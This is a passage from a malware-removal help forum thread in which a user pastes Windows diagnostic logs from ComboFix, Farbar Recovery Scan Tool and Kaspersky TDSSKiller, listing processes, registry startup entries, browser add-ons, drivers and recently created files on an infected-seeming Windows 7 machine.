[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-28  09:58:56
ComboFix-quarantined-files.txt  2014-10-28 13:58
ComboFix2.txt  2014-10-28 13:36
.
Pre-Run: 108,518,948,864 bytes free
Post-Run: 108,367,802,368 bytes free
.
- - End Of File - - 89F220DE54E26226DF60D1E6661C02AC
A36C5E4F47E84449FF07ED3517B43A31
 
========= End of CMD: =========
 
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4} => Moved successfully.
C:\ProgramData\Windows Genuine Advantage => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
 
FRST.TXT
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 30-10-2014
Ran by KELI (administrator) on ATTY-2 on 30-10-2014 09:18:27
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-30 09:18 - 2014-10-30 09:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (2).exe
2014-10-30 09:18 - 2014-10-30 09:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskiller (2).exe
2014-10-30 09:15 - 2014-10-30 09:15 - 00000000 ____D () C:\Users\KELI\Desktop\FRST-OlderVersion
2014-10-30 09:14 - 2014-10-30 09:14 - 00000619 _____ () C:\Users\KELI\Documents\fixlist.txt
2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-28 10:02 - 00023989 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-30 09:18 - 00012652 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-30 09:18 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-30 09:15 - 01105408 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogfvpt.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-27 18:50
 
==================== End Of Log ============================
 
 
*******....continued on next post


#6 ScotDesort

Posted 30 October 2014 - 08:27 AM

....continued

 

TDSS LOG
 
09:21:27.0923 0x0d88  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
09:21:31.0667 0x0d88  ============================================================
09:21:31.0667 0x0d88  Current date / time: 2014/10/30 09:21:31.0667
09:21:31.0667 0x0d88  SystemInfo:
09:21:31.0667 0x0d88  
09:21:31.0667 0x0d88  OS Version: 6.1.7601 ServicePack: 1.0
09:21:31.0667 0x0d88  Product type: Workstation
09:21:31.0667 0x0d88  ComputerName: ATTY-2
09:21:31.0667 0x0d88  UserName: KELI
09:21:31.0667 0x0d88  Windows directory: C:\Windows
09:21:31.0667 0x0d88  System windows directory: C:\Windows
09:21:31.0667 0x0d88  Processor architecture: Intel x86
09:21:31.0667 0x0d88  Number of processors: 2
09:21:31.0667 0x0d88  Page size: 0x1000
09:21:31.0667 0x0d88  Boot type: Normal boot
09:21:31.0667 0x0d88  ============================================================
09:21:33.0103 0x0d88  KLMD registered as C:\Windows\system32\drivers\64460635.sys
09:21:33.0305 0x0d88  System UUID: {7720DF7E-60B5-D310-D451-A8568080E759}
09:21:33.0680 0x0d88  Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 ( 149.05 Gb ), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
09:21:33.0680 0x0d88  ============================================================
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0:
09:21:33.0680 0x0d88  MBR partitions:
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x3FF800
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x400000, BlocksNum 0x1171B000
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x11B1B000, BlocksNum 0xEF9800
09:21:33.0680 0x0d88  ============================================================
09:21:33.0711 0x0d88  C: <-> \Device\Harddisk0\DR0\Partition2
09:21:33.0773 0x0d88  D: <-> \Device\Harddisk0\DR0\Partition3
09:21:33.0773 0x0d88  ============================================================
09:21:33.0773 0x0d88  Initialize success
09:21:33.0789 0x0d88  ============================================================
09:21:35.0583 0x0304  ============================================================
09:21:35.0583 0x0304  Scan started
09:21:35.0583 0x0304  Mode: Manual; 
09:21:35.0583 0x0304  ============================================================
09:21:35.0583 0x0304  KSN ping started
09:21:38.0349 0x0304  KSN ping finished: true
09:21:39.0229 0x0304  ================ Scan system memory ========================
09:21:39.0229 0x0304  System memory - ok
09:21:39.0229 0x0304  ================ Scan services =============================
09:21:43.0561 0x0304  FltMgr - ok
09:21:43.0614 0x0304  [ E12C4928B32ACE04610259647F072635, B71B9C2DF45F33C4DAC88435129B08B0BCDBBE82E8C3AD0A95F00137CC8B619F ] FontCache       C:\Windows\system32\FntCache.dll
09:21:43.0630 0x0304  FontCache - ok
09:21:43.0680 0x0304  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
09:21:43.0680 0x0304  FontCache3.0.0.0 - ok
09:21:43.0683 0x0304  [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
09:21:43.0683 0x0304  FsDepends - ok
09:21:43.0714 0x0304  [ 7DAE5EBCC80E45D3253F4923DC424D05, 8A2C4D5591509B0B0A44583520617A9AE34F32BB6E68A012A7D7870ED24F703A ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
09:21:43.0714 0x0304  Fs_Rec - ok
09:21:43.0799 0x0304  [ E306A24D9694C724FA2491278BF50FDB, 1D246B9C28550640EACBF8CF9DC980FD75106B92832D392FEBEF0C7012353091 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
09:21:43.0799 0x0304  fvevol - ok
09:21:43.0861 0x0304  [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
09:21:43.0877 0x0304  gagp30kx - ok
09:21:43.0916 0x0304  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
09:21:43.0916 0x0304  gpsvc - ok
09:21:43.0983 0x0304  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
09:21:43.0983 0x0304  gupdate - ok
09:21:44.0014 0x0304  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
09:21:44.0014 0x0304  gupdatem - ok
09:21:44.0079 0x0304  [ 5D4BC124FAAE6730AC002CDB67BF1A1C, 00294F4DC7D17F6DD2A22B9C3299BED40146BA45C972367154D20DB502472551 ] gusvc           C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
09:21:44.0082 0x0304  gusvc - ok
